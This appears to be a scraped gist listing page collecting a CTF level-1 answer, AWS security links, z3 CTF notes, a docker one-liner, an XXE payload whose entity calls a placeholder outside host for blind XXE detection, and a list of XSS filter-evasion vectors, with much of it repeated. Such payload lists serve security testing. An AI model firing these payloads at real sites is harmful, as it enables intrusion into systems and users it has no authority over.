Abdillah Hasny abdilahrf

## CTF_Solutions.txt
http://ctf.infosecinstitute.com/

## Level 1:

View the source, at the top we see:

<!-- infosec_flagis_welcome -->

Level 1 PASS: infosec_flagis_welcome

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## AWS Security Resources
INTRO
I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute.

Short Link: http://tiny.cc/awssecurity

Official AWS Security Resources
* Security Blog - http://blogs.aws.amazon.com/security/
* Security Advisories - http://aws.amazon.com/security/security-bulletins/
* Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf
* Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf

## notes.md

      
              1 file
            
          
              0 forks
            
          
              1 comment
            
          
              6 stars
            
          
                ancat
                / notes.md
            
            
              Created
              March 3, 2014 01:23
            
              
                z3 for ctf
              
          
    Practice Challenges


HSVM sum challenge
pCTF 2013 "cone" challenge
CSAW 2013 reversing 300

Resources/Writeups


Eindbazen "cone" writeup
Rolf Rolle's z3 based solution to some math problem
SMT Solvers for Software Security


## docker_kill.sh
docker ps | awk {' print $1 '} | tail -n+2 > tmp.txt; for line in $(cat tmp.txt); do docker kill $line; done; rm tmp.txt

## 666_lines_of_XSS_vectors.html
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
	http://ctf.infosecinstitute.com/

	## Level 1:

	View the source, at the top we see:

	<!-- infosec_flagis_welcome -->

	Level 1 PASS: infosec_flagis_welcome
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	INTRO
	I get asked regularly for good resources on AWS security. This gist collects some of these resources (docs, blogs, talks, open source tools, etc.). Feel free to suggest and contribute.

	Short Link: http://tiny.cc/awssecurity

	Official AWS Security Resources
	* Security Blog - http://blogs.aws.amazon.com/security/
	* Security Advisories - http://aws.amazon.com/security/security-bulletins/
	* Security Whitepaper (AWS Security Processes/Practices) - http://media.amazonwebservices.com/pdf/AWS_Security_Whitepaper.pdf
	* Security Best Practices Whitepaper - http://media.amazonwebservices.com/AWS_Security_Best_Practices.pdf
	<script\x20type="text/javascript">javascript:alert(1);</script>
	<script\x3Etype="text/javascript">javascript:alert(1);</script>
	<script\x0Dtype="text/javascript">javascript:alert(1);</script>
	<script\x09type="text/javascript">javascript:alert(1);</script>
	<script\x0Ctype="text/javascript">javascript:alert(1);</script>
	<script\x2Ftype="text/javascript">javascript:alert(1);</script>
	<script\x0Atype="text/javascript">javascript:alert(1);</script>
	'`"><\x3Cscript>javascript:alert(1)</script>
	'`"><\x00script>javascript:alert(1)</script>
	<img src=1 href=1 onerror="javascript:alert(1)"></img>